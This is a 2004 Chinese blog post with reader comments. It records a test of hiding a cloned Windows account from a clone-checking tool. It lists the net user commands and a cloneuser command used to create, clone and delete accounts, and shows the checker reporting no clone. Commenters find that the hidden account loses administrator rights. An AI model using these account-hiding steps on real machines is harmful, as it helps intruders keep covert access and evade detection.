隐形的克隆帐号测试(测试成功^_^)(ALLyeSNO)

于 2004-12-29 16:23:00 发布
阅读量2k 收藏
点赞数
分类专栏: 原创文章 木马后门 文章标签: 测试 user c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/freexploit/article/details/233501
版权

利用了 检测程序的漏洞

通过比较 注册表的 f 和 v键值

C:/WINNT/system32>net user allyesno babybear /add
命令成功完成。

C:/WINNT/system32>net localgroup administrators allyesno /add
命令成功完成。


C:/WINNT/system32>net user hideclone babybear /add
命令成功完成。


C:/WINNT/system32>cloneuser allyesno hideclone

C:/WINNT/system32>net user allyesno /delete
命令成功完成。

C:/WINNT/system32>net user hideclone
用户名 hideclone
本地组会员 *Users
全局组成员 *None
命令成功完成。

检测


[Melody]#checkclone

No Clone Is Found

Check Account Clone Complete

[Melody]#^_^ 成功



WinEggDrop
我怀疑被克隆的帐号是否还具有Administrators组的权限.


zzzevazzz
opentelnet
然后用hideclone登陆telnet,再尝试启动或停止服务。
如果可以,那就是admin。

WinEggDrop
it's not in Administrators group is the original account is deleted


allyesno
嗯 失去了 ad的权限 wineggdrop的置疑是正确的

另外倒是引出了 我的另一个思路 刚才已经测试过了

通过这个方法 将原有的ad权限帐号A 克隆成其他ad权限的帐号B

然后再把B进行删除 虽然 这个A帐号在查看的时候仍然是在administrators组 但是已经不具备ad权限 通过这个 可以做一些帐号限制

不知道 我这个想法 还有什么瑕疵吗?

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值